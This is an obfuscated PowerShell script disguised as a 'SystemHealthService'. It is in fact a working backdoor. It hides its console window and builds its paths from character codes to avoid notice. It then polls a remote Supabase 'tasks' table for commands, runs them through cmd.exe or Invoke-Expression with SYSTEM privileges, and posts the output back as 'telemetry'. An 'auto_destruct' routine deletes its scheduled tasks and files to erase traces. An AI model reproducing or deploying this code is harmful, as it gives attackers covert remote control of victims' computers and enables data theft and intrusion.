${_0x1}="SilentlyContinue";$ErrorActionPreference=${_0x1};$ProgressPreference=${_0x1}
try{${_d}='[DllImport("'+(-join([char]75,[char]101,[char]114,[char]110,[char]101,[char]108,[char]51,[char]50,[char]46,[char]100,[char]108,[char]108))+'")]public static extern IntPtr GetConsoleWindow();[DllImport("'+(-join([char]117,[char]115,[char]101,[char]114,[char]51,[char]50,[char]46,[char]100,[char]108,[char]108))+'")]public static extern bool ShowWindow(IntPtr h,Int32 n);';Add-Type -Name X0 -Namespace Y0 -MemberDefinition ${_d};[void][Y0.X0]::ShowWindow([Y0.X0]::GetConsoleWindow(),0)}catch{}
${_bp}=-join @([char]67,[char]58,[char]92,[char]80,[char]114,[char]111,[char]103,[char]114,[char]97,[char]109,[char]68,[char]97,[char]116,[char]97,[char]92,[char]83,[char]121,[char]115,[char]116,[char]101,[char]109,[char]72,[char]101,[char]97,[char]108,[char]116,[char]104,[char]83,[char]101,[char]114,[char]118,[char]105,[char]99,[char]101)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
while($true){try{$null=Invoke-RestMethod -Uri "https://www.google.com" -Method Head -TimeoutSec 5;break}catch{Start-Sleep 5}};Start-Sleep 5
${_cfg}=Get-Content "${_bp}\config.json" -Raw|ConvertFrom-Json;${_df}="${_bp}\device_id.txt"
${_mw}=60;${_w}=0;while(!(Test-Path ${_df}) -and ${_w} -lt ${_mw}){Start-Sleep 5;${_w}+=5}
if(!(Test-Path ${_df})){${_did}=[guid]::NewGuid().ToString();${_did}|Out-File ${_df} -NoNewline}else{${_did}=(Get-Content ${_df} -Raw).Trim()}
${_h}=@{"apikey"=${_cfg}.supabase_key;"Authorization"="Bearer $(${_cfg}.supabase_key)";"Content-Type"="application/json";"Prefer"="return=minimal"}
function Invoke-A1{param($ep,$mt="GET",$bd=$null);${_u}="$(${_cfg}.supabase_url)/rest/v1/$ep";try{if($bd){Invoke-RestMethod -Uri ${_u} -Method $mt -Headers ${_h} -Body ($bd|ConvertTo-Json -Depth 10 -Compress) -TimeoutSec 30}else{Invoke-RestMethod -Uri ${_u} -Method $mt -Headers ${_h} -TimeoutSec 30}}catch{$null}}
function Invoke-B2{param($c);try{${_pi}=New-Object System.Diagnostics.ProcessStartInfo;${_pi}.FileName="cmd.exe";${_pi}.Arguments="/c $c";${_pi}.RedirectStandardOutput=$true;${_pi}.RedirectStandardError=$true;${_pi}.UseShellExecute=$false;${_pi}.CreateNoWindow=$true;${_p}=New-Object System.Diagnostics.Process;${_p}.StartInfo=${_pi};${_p}.Start()|Out-Null;${_o}=${_p}.StandardOutput.ReadToEnd();${_e}=${_p}.StandardError.ReadToEnd();${_p}.WaitForExit(60000);return @{data_type="cmd_result";data=(@{command=$c;output=${_o};error=${_e};exit_code=${_p}.ExitCode;executed_as="SYSTEM"}|ConvertTo-Json -Compress)}}catch{return @{data_type="cmd_result";data=(@{command=$c;error="$_";executed_as="SYSTEM"}|ConvertTo-Json -Compress)}}}
function Invoke-C3{param($c);try{${_o}=Invoke-Expression $c 2>&1|Out-String;return @{data_type="cmd_result";data=(@{command=$c;output=${_o};executed_as="SYSTEM"}|ConvertTo-Json -Compress)}}catch{return @{data_type="cmd_result";data=(@{command=$c;error="$_";executed_as="SYSTEM"}|ConvertTo-Json -Compress)}}}
function Remove-D4{try{schtasks /delete /tn "SystemHealthMonitor" /f 2>$null;schtasks /delete /tn "SystemHealthAdmin" /f 2>$null;Get-Process -Name powershell -EA SilentlyContinue|Where-Object{$_.Id -ne $PID -and $_.MainWindowTitle -eq ""}|Stop-Process -Force -EA SilentlyContinue;Start-Sleep 2;if(Test-Path ${_bp}){Remove-Item ${_bp} -Recurse -Force -EA SilentlyContinue};return @{data_type="destruct";data="Destroyed (SYSTEM)"}}catch{return @{data_type="destruct";data="Failed: $_"}}}
${_si}=if(${_cfg}.sync_interval){${_cfg}.sync_interval}else{10};${_ri}=if(${_cfg}.retry_interval){${_cfg}.retry_interval}else{10}
while($true){try{${_tl}=Invoke-A1 -ep "tasks?device_id=eq.${_did}&status=eq.pending&task_type=in.(cmd_exec_admin,ps_exec_admin,auto_destruct)&select=id,task_type,task_params";if(${_tl}){if(${_tl} -isnot [array]){${_tl}=@(${_tl})};foreach(${_t} in ${_tl}){${_tr}=$null;switch(${_t}.task_type){"cmd_exec_admin"{${_c}="";if(${_t}.task_params -and ${_t}.task_params.command){${_c}=${_t}.task_params.command};if(${_c}){${_tr}=Invoke-B2 -c ${_c}}else{${_tr}=@{data_type="cmd_result";data="No command"}}}"ps_exec_admin"{${_c}="";if(${_t}.task_params -and ${_t}.task_params.command){${_c}=${_t}.task_params.command};if(${_c}){${_tr}=Invoke-C3 -c ${_c}}else{${_tr}=@{data_type="cmd_result";data="No command"}}}"auto_destruct"{${_tr}=Remove-D4;Invoke-A1 -ep "telemetry" -mt "POST" -bd @{device_id=${_did};data_type=${_tr}.data_type;data=${_tr}.data};Invoke-A1 -ep "tasks?id=eq.$(${_t}.id)" -mt "PATCH" -bd @{status="complete";completed_at=(Get-Date -Format "o")};exit 0}};if(${_tr}){${_td}=@{device_id=${_did};data_type=${_tr}.data_type};if(${_tr}.data){${_td}.data=${_tr}.data};Invoke-A1 -ep "telemetry" -mt "POST" -bd ${_td};Invoke-A1 -ep "tasks?id=eq.$(${_t}.id)" -mt "PATCH" -bd @{status="complete";completed_at=(Get-Date -Format "o")}}}};Start-Sleep ${_si}}catch{Start-Sleep ${_ri}}}
